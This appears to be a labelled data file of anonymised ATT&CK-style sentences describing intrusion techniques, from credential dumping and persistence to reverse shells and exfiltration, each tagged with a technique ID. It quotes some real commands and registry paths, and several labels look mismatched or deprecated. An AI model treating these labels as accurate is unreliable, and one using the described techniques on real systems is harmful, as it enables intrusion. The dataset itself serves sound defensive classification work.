{"text1":"has collected information from Microsoft SharePoint services within target networks.","labels":"['T1213']"}
{"text1":"has commands to delete files and persistence mechanisms from the victim.","labels":"['T1070.004']"}
{"text1":"has commands to enumerate all storage devices and to find all files that start with a particular string.","labels":"['T1083']"}
{"text1":"has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.","labels":"['T1083']"}
{"text1":"has commands to get the current user's name and SID.","labels":"['T1033']"}
{"text1":"has commands to get the time the machine was built, the time, and the time zone.","labels":"['T1124']"}
{"text1":"has compressed and encrypted data into password-protected RAR archives prior to exfiltration.","labels":"['T1486']"}
{"text1":"has compressed data into password-protected RAR archives prior to exfiltration.","labels":"['T1560']"}
{"text1":"has compressed files before exfiltration using TAR and RAR.","labels":"['T1560']"}
{"text1":"has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.","labels":"['T1598.002']"}
{"text1":"has conducted port scans on a host.","labels":"['T1046']"}
{"text1":"has connected to C2 servers through proxies.","labels":"['T1090']"}
{"text1":"has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.","labels":"['T1021.002']"}
{"text1":"has created a scheduled task named \u201cAdobeFlashSync\u201d to establish persistence.","labels":"['T1036']"}
{"text1":"has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.","labels":"['T1550.003']"}
{"text1":"has created new services to establish persistence.","labels":"['T1543.003']"}
{"text1":"has created Windows tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"has deleted and overwrote files to cover tracks.","labels":"['T1070.004']"}
{"text1":"has deleted existing logs and exfiltrated file archives from a victim.","labels":"['T1070.004']"}
{"text1":"has deleted files associated with their payload after execution.","labels":"['T1070.004']"}
{"text1":"has deleted Registry keys during post compromise cleanup activities.","labels":"['T1112']"}
{"text1":"has deleted tmp and prefetch files during post compromise cleanup activities.","labels":"['T1070.004']"}
{"text1":"has delivered  and  by executing PowerShell commands through DDE in Word documents.","labels":"['T1559.002']"}
{"text1":"has delivered malicious links and macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system.","labels":"['T1204']"}
{"text1":"has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.","labels":"['T1598.003']"}
{"text1":"has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.","labels":"['T1598.002']"}
{"text1":"has deployed a bootkit along with  to ensure its persistence on the victim. The bootkit shares code with some variants of .","labels":"['T1542.003']"}
{"text1":"has deployed backup web shells and obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.","labels":"['T1108']"}
{"text1":"has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.","labels":"['T1105']"}
{"text1":"has detached network shares after exfiltrating files, likely to evade detection.","labels":"['T1070.005']"}
{"text1":"has detected security tools.","labels":"['T1518.001']"}
{"text1":"has disabled host-based firewalls. The group has also globally opened port 3389.","labels":"['T1562.001']"}
{"text1":"has distributed targeted emails containing links to malicious documents with embedded macros.","labels":"['T1598.003']"}
{"text1":"has distributed targeted emails containing Word documents with embedded malicious macros.","labels":"['T1598.002']"}
{"text1":"has downloaded additional code and files from servers onto victims.","labels":"['T1105']"}
{"text1":"has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.","labels":"['T1105']"}
{"text1":"has downloaded additional malware, including by using .","labels":"['T1105']"}
{"text1":"has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.","labels":"['T1105']"}
{"text1":"has downloaded additional scripts and files from adversary-controlled servers.  has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.","labels":"['T1105']"}
{"text1":"has downloaded second stage malware from compromised websites.","labels":"['T1105']"}
{"text1":"has dumped credentials, including by using .","labels":"['T1003']"}
{"text1":"has dumped credentials from victims. Specifically, the group has used the tool GET5 Penetrator to look for remote login and hard-coded credentials.","labels":"['T1003']"}
{"text1":"has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key.","labels":"['T1027']"}
{"text1":"has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.","labels":"['T1027']"}
{"text1":"has encrypted and encoded data in its malware, including by using base64.","labels":"['T1027']"}
{"text1":"has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.","labels":"['T1573']"}
{"text1":"has encrypted C2 traffic with RSA.","labels":"['T1573']"}
{"text1":"has encrypted documents and malicious executables.","labels":"['T1027']"}
{"text1":"has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.","labels":"['T1547.001']"}
{"text1":"has established persistence by setting the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run key value for wdm to the path of the executable. It has also used the Registry entry HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn \u201c%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe\u201d to establish persistence.","labels":"['T1547.001']"}
{"text1":"has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.","labels":"['T1053.005']"}
{"text1":"has established persistence by using the Registry option in PowerShell Empire to add a Run key.","labels":"['T1547.001']"}
{"text1":"has exfiltrated data in HTTP POST headers.","labels":"['T1071']"}
{"text1":"has exfiltrated data over FTP separately from its primary C2 channel over DNS.","labels":"['T1048']"}
{"text1":"has exfiltrated files stolen from file shares.","labels":"['T1039']"}
{"text1":"has exfiltrated files stolen from local systems.","labels":"['T1005']"}
{"text1":"has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.","labels":"['T1203']"}
{"text1":"has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.","labels":"['T1068']"}
{"text1":"has exploited Microsoft Word vulnerability CVE-2014-4114 for execution.","labels":"['T1203']"}
{"text1":"has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.","labels":"['T1203']"}
{"text1":"has exploited the CVE-2016-0167 local vulnerability.","labels":"['T1068']"}
{"text1":"has functionality to copy itself to network shares.","labels":"['T1080']"}
{"text1":"has functionality to remove Registry Run key persistence as a cleanup procedure.","labels":"['T1112']"}
{"text1":"has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.","labels":"['T1187']"}
{"text1":"has gathered information about local network connections using .","labels":"['T1049']"}
{"text1":"has infected victims by tricking them into visiting compromised watering hole websites.","labels":"['T1189']"}
{"text1":"has infected victims using watering holes.","labels":"['T1189']"}
{"text1":"has injected SMB URLs into malicious Word spearphishing attachments to initiate .","labels":"['T1221']"}
{"text1":"has inserted garbage characters into code, presumably to avoid anti-virus detection.","labels":"['T1027.001']"}
{"text1":"has installed updates and new malware on victims.","labels":"['T1105']"}
{"text1":"has interacted with compromised systems to browse and copy files through its graphical user interface in  sessions.","labels":"['T1061']"}
{"text1":"has keylogging functionality.","labels":"['T1056']"}
{"text1":"has leveraged a zero-day vulnerability to escalate privileges.","labels":"['T1068']"}
{"text1":"has leveraged multiple types of spearphishing in order to attempt to get a user to open links and attachments.","labels":"['T1204']"}
{"text1":"has masqueraded as legitimate Adobe Content Management System files.","labels":"['T1036']"}
{"text1":"has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.","labels":"['T1036']"}
{"text1":"has modules that are capable of capturing audio.","labels":"['T1123']"}
{"text1":"has obfuscated code using base64 and gzip compression.","labels":"['T1027']"}
{"text1":"has obfuscated DLLs and functions using dummy API calls inserted between real instructions.","labels":"['T1027.001']"}
{"text1":"has obfuscated strings in  by base64 encoding, and then encrypting them.","labels":"['T1027']"}
{"text1":"has packed malware payloads before delivery to victims.","labels":"['T1027.002']"}
{"text1":"has performed C2 using DNS via A, OPT, and TXT records.","labels":"['T1071']"}
{"text1":"has performed credential dumping with  and Lazagne.","labels":"['T1003']"}
{"text1":"has performed DLL search order hijacking to execute their payload.","labels":"['T1574.001']"}
{"text1":"has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).","labels":"['T1113']"}
{"text1":"has performed timestomping on victim files.","labels":"['T1070.006']"}
{"text1":"has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.","labels":"['T1102']"}
{"text1":"has registered a Windows shell script under the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence.","labels":"['T1037']"}
{"text1":"has registered itself as a scheduled task to run each time the current user logs in.","labels":"['T1053.005']"}
{"text1":"has registered itself as a service to establish persistence.","labels":"['T1543.003']"}
{"text1":"has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to dump credentials any time a domain, local user, or administrator logs in or changes a password.","labels":"['T1003']"}
{"text1":"has retrieved internal documents from machines inside victim environments, including by using  to stage documents before.","labels":"['T1005']"}
{"text1":"has run a keylogger plug-in on a victim.","labels":"['T1056']"}
{"text1":"has run a plug-in on a victim to spread through the local network by using  and accessing admin shares.","labels":"['T1021.002']"}
{"text1":"has run hostname and systeminfo on a victim.","labels":"['T1082']"}
{"text1":"has run net user, net user \/domain, net group \u201cdomain admins\u201d \/domain, and net group \u201cExchange Trusted Subsystem\u201d \/domain to get account listings on a victim.","labels":"['T1087']"}
{"text1":"has run whoami on a victim.","labels":"['T1033']"}
{"text1":"has sent a C2 response that was base64-encoded.","labels":"['T1132']"}
{"text1":"has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.","labels":"['T1598.002']"}
{"text1":"has sent malicious Word OLE compound documents to victims.","labels":"['T1559.002']"}
{"text1":"has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.","labels":"['T1204']"}
{"text1":"has sent spearphishing attachments attempting to get a user to open them.","labels":"['T1204']"}
{"text1":"has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.","labels":"['T1598.002']"}
{"text1":"has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.","labels":"['T1598.002']"}
{"text1":"has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution. The group has also used an exploit toolkit known as Threadkit that launches .bat files.","labels":"['T1064']"}
{"text1":"has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon.","labels":"['T1552.002']"}
{"text1":"has sometimes used drive-by attacks against vulnerable browser plugins.","labels":"['T1189']"}
{"text1":"has staged encrypted archives for exfiltration on Internet-facing servers that had previously been compromised with .","labels":"['T1074']"}
{"text1":"has targeted victims using spearphishing emails with malicious Microsoft Word attachments.","labels":"['T1598.002']"}
{"text1":"has targeted victims with spearphishing emails containing malicious Microsoft Word documents.","labels":"['T1598.002']"}
{"text1":"has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.","labels":"['T1027.005']"}
{"text1":"has the ability to create a reverse shell.","labels":"['T1059']"}
{"text1":"has the ability to discover and manipulate Windows services.","labels":"['T1007']"}
{"text1":"has the ability to download and execute additional files.","labels":"['T1105']"}
{"text1":"has the ability to download files.","labels":"['T1105']"}
{"text1":"has the ability to enumerate drive types.","labels":"['T1083']"}
{"text1":"has the ability to enumerate processes.","labels":"['T1057']"}
{"text1":"has the ability to enumerate system information.","labels":"['T1082']"}
{"text1":"has the ability to execute shell commands.","labels":"['T1059']"}
{"text1":"has the ability to identify any anti-virus installed on the infected system.","labels":"['T1518.001']"}
{"text1":"has the ability to initiate keylogging and screen captures.","labels":"['T1113']"}
{"text1":"has the ability to list processes on the system.","labels":"['T1057']"}
{"text1":"has the ability to modify the Registry.","labels":"['T1112']"}
{"text1":"has the ability to obtain screenshots of the compromised system.","labels":"['T1113']"}
{"text1":"has the ability to remove Registry entries that it created during execution.","labels":"['T1070']"}
{"text1":"has the ability to scan for security tools such as firewalls and antivirus tools.","labels":"['T1518.001']"}
{"text1":"has the ability to search for a given filename on a victim.","labels":"['T1083']"}
{"text1":"has the ability to upload and download files from its C2 server.","labels":"['T1105']"}
{"text1":"has the capability to access the webcam on the victim\u2019s machine.","labels":"['T1125']"}
{"text1":"has the capability to add its own account to the victim's machine.","labels":"['T1136']"}
{"text1":"has the capability to capture audio from a victim machine.","labels":"['T1123']"}
{"text1":"has the capability to capture keystrokes.","labels":"['T1056']"}
{"text1":"has the capability to capture screenshots.","labels":"['T1113']"}
{"text1":"has the capability to capture video from a victim machine.","labels":"['T1125']"}
{"text1":"has the capability to communicate over a backup channel via plus.google.com.","labels":"['T1008']"}
{"text1":"has the capability to create a remote shell.","labels":"['T1059']"}
{"text1":"has the capability to create a remote shell and execute specified commands.","labels":"['T1059']"}
{"text1":"has the capability to create a reverse shell.","labels":"['T1059']"}
{"text1":"has the capability to create a reverse shell on victims.","labels":"['T1059']"}
{"text1":"has the capability to delete files off the victim\u2019s machine.","labels":"['T1070.004']"}
{"text1":"has the capability to delete local files.","labels":"['T1070.004']"}
{"text1":"has the capability to discover processes.","labels":"['T1057']"}
{"text1":"has the capability to download a file to the victim from the C2 server.","labels":"['T1105']"}
{"text1":"has the capability to download files.","labels":"['T1105']"}
{"text1":"has the capability to download files from the C2 server.","labels":"['T1105']"}
{"text1":"has the capability to enumerate files.","labels":"['T1083']"}
{"text1":"has the capability to execute the command ipconfig \/all.","labels":"['T1016']"}
{"text1":"has the capability to execute the command net start to interact with services.","labels":"['T1007']"}
{"text1":"has the capability to execute ver, systeminfo, and gpresult commands.","labels":"['T1082']"}
{"text1":"has the capability to gather the IP address from the victim's machine.","labels":"['T1016']"}
{"text1":"has the capability to gather the system\u2019s hostname and OS version.","labels":"['T1082']"}
{"text1":"has the capability to gather the username from the victim's machine.","labels":"['T1033']"}
{"text1":"has the capability to gather the victim's current directory.","labels":"['T1083']"}
{"text1":"has the capability to gather the victim's proxy information.","labels":"['T1016']"}
{"text1":"has the capability to identify remote hosts on connected networks.","labels":"['T1018']"}
{"text1":"has the capability to log keystrokes from the victim\u2019s machine.","labels":"['T1056']"}
{"text1":"has the capability to obtain a listing of running processes (including loaded modules).","labels":"['T1057']"}
{"text1":"has the capability to obtain file and directory listings.","labels":"['T1083']"}
{"text1":"has the capability to open a remote shell and run basic commands.","labels":"['T1059']"}
{"text1":"has the capability to retrieve information about groups.","labels":"['T1069']"}
{"text1":"has the capability to retrieve information about shares on remote hosts.","labels":"['T1135']"}
{"text1":"has the capability to retrieve information about the OS.","labels":"['T1082']"}
{"text1":"has the capability to retrieve information about users on remote hosts.","labels":"['T1087']"}
{"text1":"has the capability to scan for open ports on hosts in a connected network.","labels":"['T1046']"}
{"text1":"has the capability to schedule remote AT jobs.","labels":"['T1053.005']"}
{"text1":"has the capability to take screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"has the capability to use rm -rf to remove folders and files from the victim's machine.","labels":"['T1070.004']"}
{"text1":"has transferred files using the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel.","labels":"['T1105']"}
{"text1":"has tunneled RDP backdoors over port 443.","labels":"['T1043']"}
{"text1":"has updated and modified its malware, resulting in different hash values that evade detection.","labels":"['T1027.005']"}
{"text1":"has used , a RAT that uses HTTP to communicate.","labels":"['T1071']"}
{"text1":"has used a Batch file to automate frequently executed post compromise cleanup activities.","labels":"['T1064']"}
{"text1":"has used a batch script that adds a Registry Run key to establish malware persistence.","labels":"['T1547.001']"}
{"text1":"has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.","labels":"['T1140']"}
{"text1":"has used a global service provider's IP as a proxy for C2 traffic from a victim.","labels":"['T1090']"}
{"text1":"has used a keylogging tool called KEYPUNCH.","labels":"['T1056']"}
{"text1":"has used a keylogging tool that records keystrokes in encrypted files.","labels":"['T1056']"}
{"text1":"has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.","labels":"['T1059.001']"}
{"text1":"has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.  has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.","labels":"['T1064']"}
{"text1":"has used an audio capturing utility known as SOUNDWAVE that captures microphone input.","labels":"['T1123']"}
{"text1":"has used Android backdoors capable of enumerating specific files on the infected devices.","labels":"['T1083']"}
{"text1":"has used Android backdoors capable of exfiltrating specific files directly from the infected devices.","labels":"['T1005']"}
{"text1":"has used  and  to register a scheduled task to execute malware during lateral movement.","labels":"['T1053.005']"}
{"text1":"has used an RSS feed on Livejournal to update a list of encrypted C2 server names.","labels":"['T1102']"}
{"text1":"has used AOL Instant Messenger for C2.","labels":"['T1102']"}
{"text1":"has used appcmd.exe to disable logging on a victim server.","labels":"['T1562.001']"}
{"text1":"has used application shim databases for persistence.","labels":"['T1546.011']"}
{"text1":"has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.","labels":"['T1547.001']"}
{"text1":"has used a scheduled task for persistence.","labels":"['T1053.005']"}
{"text1":"has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.","labels":"['T1053.005']"}
{"text1":"has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries.","labels":"['T1569.002']"}
{"text1":"has used a tool that can obtain info about local and global group users, power users, and administrators.","labels":"['T1087']"}
{"text1":"has used a tool to capture screenshots.","labels":"['T1113']"}
{"text1":"has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument \"dig.\" The group has also used a tools to dump passwords from browsers.","labels":"['T1003']"}
{"text1":"has used automated collection.","labels":"['T1119']"}
{"text1":"has used a variant of NanoCore RAT that communicates with its C2 server over port 6666.","labels":"['T1571']"}
{"text1":"has used batch scripting to automate execution of commands.","labels":"['T1064']"}
{"text1":"has used batch scripts and scheduled tasks to delete critical system files.","labels":"['T1070.004']"}
{"text1":"has used batch scripts in its malware to install persistence mechanisms.","labels":"['T1064']"}
{"text1":"has used bitsadmin.exe to download additional tools.","labels":"['T1197']"}
{"text1":"has used brute force techniques to obtain credentials.","labels":"['T1110']"}
{"text1":"has used C:\\Windows\\Debug and C:\\Perflogs as staging directories.","labels":"['T1074']"}
{"text1":"has used cmd.exe to execute commmands.","labels":"['T1059']"}
{"text1":"has used CMSTP.exe and a malicious INF to execute its  payload.","labels":"['T1218.003']"}
{"text1":"has used code-signing certificates on its malware that are either forged due to weak keys or stolen.","labels":"['T1553.002']"}
{"text1":"has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload.","labels":"['T1546.015']"}
{"text1":"has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).","labels":"['T1546.015']"}
{"text1":"has used compromised credentials to access other systems on a victim network.","labels":"['T1078']"}
{"text1":"has used compromised WordPress blogs as C2 servers.","labels":"['T1102']"}
{"text1":"has used credential dumping tools.","labels":"['T1003']"}
{"text1":"has used credential dumping tools such as  and Lazagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.","labels":"['T1003']"}
{"text1":"has used custom DNS Tunneling protocols for C2.","labels":"['T1095']"}
{"text1":"has used CVE-2014-6324 to escalate privileges.","labels":"['T1068']"}
{"text1":"has used CVE-2015-4902 to bypass security features.","labels":"['T1211']"}
{"text1":"has used Daniel Bohannon\u2019s Invoke-Obfuscation framework. The group also used files with base64 encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"has used DLL search order hijacking.","labels":"['T1574.001']"}
{"text1":"has used DLL side-loading.","labels":"['T1574.002']"}
{"text1":"has used DLL side-loading to load malicious payloads.","labels":"['T1574.002']"}
{"text1":"has used encoded PowerShell scripts uploaded to  installations to download and install , as well as to evade defenses.","labels":"['T1064']"}
{"text1":"has used encoded PowerShell scripts uploaded to  installations to download and install .  also used PowerShell scripts to evade defenses.","labels":"['T1059.001']"}
{"text1":"has used exploits to increase their levels of rights and privileges.","labels":"['T1068']"}
{"text1":"has used filenames and Registry key names associated with Windows Defender.","labels":"['T1036']"}
{"text1":"has used Flash Player (CVE-2016-4117, CVE-2018-4878) and Word (CVE-2017-0199) exploits for execution.","labels":"['T1203']"}
{"text1":"has used  for credential dumping, as well as Metasploit\u2019s  NTDSGRAB module to obtain a copy of the victim's Active Directory database.","labels":"['T1003']"}
{"text1":"has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.","labels":"['T1027']"}
{"text1":"has used HTTP, HTTPS, and DNS for command and control.","labels":"['T1071']"}
{"text1":"has used HTTP for C2, including sending error codes in Cookie headers.","labels":"['T1071']"}
{"text1":"has used HTTP for C2.","labels":"['T1071']"}
{"text1":"has used HTTP requests for command and control.","labels":"['T1071']"}
{"text1":"has used  in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has used certutil -decode to decode files on the victim\u2019s machine when dropping .","labels":"['T1140']"}
{"text1":"has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks.","labels":"['T1071']"}
{"text1":"has used keyloggers that are also capable of dumping credentials.","labels":"['T1003']"}
{"text1":"has used keylogging tools.","labels":"['T1056']"}
{"text1":"has used legitimate access granted to Managed Service Providers in order to access victims of interest.","labels":"['T1199']"}
{"text1":"has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.","labels":"['T1078', 'T1133']"}
{"text1":"has used macros in s as well as executed VBScripts on victim machines.","labels":"['T1064']"}
{"text1":"has used macros in Word documents that would download a second stage if executed.","labels":"['T1064']"}
{"text1":"has used malicious macros embedded inside Office documents to execute files.","labels":"['T1064']"}
{"text1":"has used Metasploit to perform reflective DLL injection in order to escalate privileges.","labels":"['T1055']"}
{"text1":"has used Meterpreter to enumerate users on remote systems.","labels":"['T1033']"}
{"text1":"has used Mshta.exe to execute its  payload.","labels":"['T1218.005']"}
{"text1":"has used mshta.exe to execute VBScript to execute malicious code on victim systems.","labels":"['T1218.005']"}
{"text1":"has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of.","labels":"['T1203']"}
{"text1":"has used multiple types of scripting for execution, including JavaScript, JavaScript Scriptlets in XML, and VBScript.","labels":"['T1064']"}
{"text1":"has used net.exe in a script with net accounts \/domain to find the password policy of a domain.","labels":"['T1201']"}
{"text1":"has used net group \/domain, net localgroup administrators, net group \u201cdomain admins\u201d \/domain, and net group \u201cExchange Trusted Subsystem\u201d \/domain to find group permission settings on a victim.","labels":"['T1069']"}
{"text1":"has used netstat -an on a victim to get a listing of network connections.","labels":"['T1049']"}
{"text1":"has used net time to check the local time on a target system.","labels":"['T1124']"}
{"text1":"has used net use to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim.","labels":"['T1049']"}
{"text1":"has used network scanning and enumeration tools, including .","labels":"['T1018']"}
{"text1":"has used ping to identify other machines of interest.","labels":"['T1018']"}
{"text1":"has used port 8080 for C2.","labels":"['T1043']"}
{"text1":"has used port 80 for C2.","labels":"['T1043']"}
{"text1":"has used ports 53, 80, 443, and 8080 for C2.","labels":"['T1043']"}
{"text1":"has used ports 8060 and 8888 for C2.","labels":"['T1571']"}
{"text1":"has used powershell.exe to download and execute scripts.","labels":"['T1059.001']"}
{"text1":"has used PowerShell-based tools and shellcode loaders for execution.","labels":"['T1059.001']"}
{"text1":"has used PowerShell for execution.","labels":"['T1059.001']"}
{"text1":"has used PowerShell for execution and privilege escalation.","labels":"['T1059.001']"}
{"text1":"has used PowerShell for execution of a payload.","labels":"['T1059.001']"}
{"text1":"has used PowerShell on victim systems to download and run payloads after exploitation.","labels":"['T1064', 'T1059.001']"}
{"text1":"has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.","labels":"['T1059.001']"}
{"text1":"has used PowerShell scripts to download and execute programs in memory, without writing to disk.","labels":"['T1064', 'T1059.001']"}
{"text1":"has used process hollowing in iexplore.exe to load the  implant.","labels":"['T1055.012']"}
{"text1":"has used Putty Secure Copy Client (PSCP) to transfer data.","labels":"['T1021']"}
{"text1":"has used Putty to access compromised systems.","labels":"['T1021']"}
{"text1":"has used RAR to compress collected data before.","labels":"['T1560']"}
{"text1":"has used RAR to stage and compress local folders.","labels":"['T1560']"}
{"text1":"has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic.","labels":"['T1573']"}
{"text1":"has used RC4 to encrypt C2 traffic.","labels":"['T1573']"}
{"text1":"has used RDP connections to move across the victim network.","labels":"['T1021.001']"}
{"text1":"has used RDP for.","labels":"['T1021.001']"}
{"text1":"has used RDP to move laterally to systems in the victim environment.","labels":"['T1021.001']"}
{"text1":"has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.","labels":"['T1547.001']"}
{"text1":"has used reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d on a victim to query the Registry.","labels":"['T1012']"}
{"text1":"has used regsvr32.exe to execute a server variant of  in victim networks.","labels":"['T1218.010']"}
{"text1":"has used regsvr32 for execution.","labels":"['T1218.010']"}
{"text1":"has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.","labels":"['T1021.001']"}
{"text1":"has used Remote Desktop Protocol to conduct lateral movement.","labels":"['T1021.001']"}
{"text1":"has used scheduled tasks to persist on victim systems.","labels":"['T1053.005']"}
{"text1":"has used sc query on a victim to gather information about services.","labels":"['T1007']"}
{"text1":"has used several different keyloggers.","labels":"['T1056']"}
{"text1":"has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.","labels":"['T1016']"}
{"text1":"has used shell and VBS scripts as well as embedded macros for execution.","labels":"['T1064']"}
{"text1":"has used shellcode to download Meterpreter after compromising a victim.","labels":"['T1105']"}
{"text1":"has used spearphishing via a link to get users to download and run their malware.","labels":"['T1204']"}
{"text1":"has used spearphishing with an attachment to deliver files with exploits to initial victims.","labels":"['T1598.002']"}
{"text1":"has used stolen certificates to sign its malware.","labels":"['T1553.002']"}
{"text1":"has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. The group has also moved laterally using the Local Administrator account.","labels":"['T1078']"}
{"text1":"has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.","labels":"['T1189']"}
{"text1":"has used TeamViewer to preserve remote access in case control using the Cobalt Strike module was lost.","labels":"['T1108']"}
{"text1":"has used Technet and Pastebin web pages for command and control.","labels":"['T1102']"}
{"text1":"has used the command-line interface.","labels":"['T1059']"}
{"text1":"has used the command-line interface for execution.","labels":"['T1059']"}
{"text1":"has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.","labels":"['T1090.004']"}
{"text1":"has used the Microsoft administration tool csvde.exe to export Active Directory data.","labels":"['T1087']"}
{"text1":"has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\\Software\\Microsoft\\Office test\\Special\\Perf to execute code.","labels":"['T1137']"}
{"text1":"has used the open source tool Essential NetTools to map the network and build a list of targets.","labels":"['T1018']"}
{"text1":"has used the Plink utility to create SSH tunnels.","labels":"['T1573']"}
{"text1":"has used the Plink utility to tunnel RDP back to C2 infrastructure.","labels":"['T1573']"}
{"text1":"has used the  RAT, which communicates over HTTP with a payload encrypted with RC4.","labels":"['T1573']"}
{"text1":"has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.","labels":"['T1546.008']"}
{"text1":"has used the Windows command shell to execute commands.","labels":"['T1059']"}
{"text1":"has used  to locate PDF, Excel, and Word documents during. The group also searched a compromised DCCC computer for specific terms.","labels":"['T1083']"}
{"text1":"has used tools to compress data before exfilling it.","labels":"['T1560']"}
{"text1":"has used tools to take screenshots from victims.","labels":"['T1113']"}
{"text1":"has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.","labels":"['T1120']"}
{"text1":"has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations.","labels":"['T1078']"}
{"text1":"has used valid accounts shared between Managed Service Providers and clients to move between the two environments.","labels":"['T1078']"}
{"text1":"has used valid digital certificates from Sysprint AG to sign its  dropper.","labels":"['T1553.002']"}
{"text1":"has used various batch scripts to establish C2, download additional files, and conduct other functions.","labels":"['T1064']"}
{"text1":"has used various forms of spearphishing attempting to get a user to open links or attachments.","labels":"['T1204']"}
{"text1":"has used various forms of spearphishing in attempts to get users to open links or attachments.","labels":"['T1204']"}
{"text1":"has used various methods of process injection including hot patching.","labels":"['T1055']"}
{"text1":"has used various tools to download files, including DGet (a similar tool to wget).","labels":"['T1105']"}
{"text1":"has used various tools to perform credential dumping.","labels":"['T1003']"}
{"text1":"has used various types of scripting for execution, including .bat and .vbs scripts. The group has also used macros to deliver malware such as  and .","labels":"['T1064']"}
{"text1":"has used VBS, VBE, and batch scripts for execution.","labels":"['T1064']"}
{"text1":"has used VBScript and JavaScript files to execute its  payload.","labels":"['T1064']"}
{"text1":"has used  via Web shell to establish redundant access. The group has also used harvested credentials to gain access to Internet-accessible resources such as Outlook Web Access, which could be used for redundant access.","labels":"['T1108']"}
{"text1":"has used Web shells, often to maintain access to a victim network.","labels":"['T1505.003']"}
{"text1":"has used Web shells to maintain access to victim websites.","labels":"['T1505.003']"}
{"text1":"has used Windows DDE for execution of commands and a malicious VBS.","labels":"['T1559.002']"}
{"text1":"has used WinSCP to exfiltrate data from a targeted organization over FTP.","labels":"['T1048']"}
{"text1":"has used WMI event filters to establish persistence.","labels":"['T1546.003']"}
{"text1":"has used WMI for persistence.","labels":"['T1546.003']"}
{"text1":"has used XOR with 0x90 to obfuscate its configuration file.","labels":"['T1027']"}
{"text1":"has utilized  during and.","labels":"['T1078']"}
